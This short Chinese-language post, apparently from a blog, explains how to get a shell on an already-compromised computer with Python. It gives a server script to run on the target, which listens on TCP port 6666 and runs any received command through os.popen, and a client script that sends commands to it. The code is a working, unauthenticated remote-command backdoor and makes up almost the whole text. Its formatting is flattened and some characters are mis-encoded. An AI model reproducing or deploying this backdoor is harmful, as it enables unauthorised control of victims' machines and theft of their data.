|
有的時候我們在獲取到目標電腦時候如果對方電腦又python 編譯環(huán)境時可以利用python 反彈shell 主要用到python os庫和sokect庫 這里的服務(wù)端在目標機上運行 from socket import *from os import *s=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協(xié)議s.bind(('',6666))#補丁端口s.listen(1)#開始監(jiān)聽一個隊列while True: sock,addr=s.accept()#返回兩次 第一次返回連接地址 二 端口號 print ('客戶端:',addr) while True: cmd=sock.recv(1024)#緩存長度 接收傳遞過來 cmdstr=cmd.decode() if cmdstr=='exit': print ('客戶端:',addr,'關(guān)閉') sock.close() break result=popen(cmdstr).read() sock.send(result.encode())s.close() 本機運行 from socket import *from os import *c=socket(AF_INET,SOCK_STREAM)#IVP4 尋址 tcp協(xié)議c.connect(('127.0.0.1',6666))#連接地址while True: cmd=input("cmd:") c.send(cmd.encode())#必須傳遞流 if cmd=='exit': c.close() break data=c.recv(1014) print (data.decode())
|
|
|
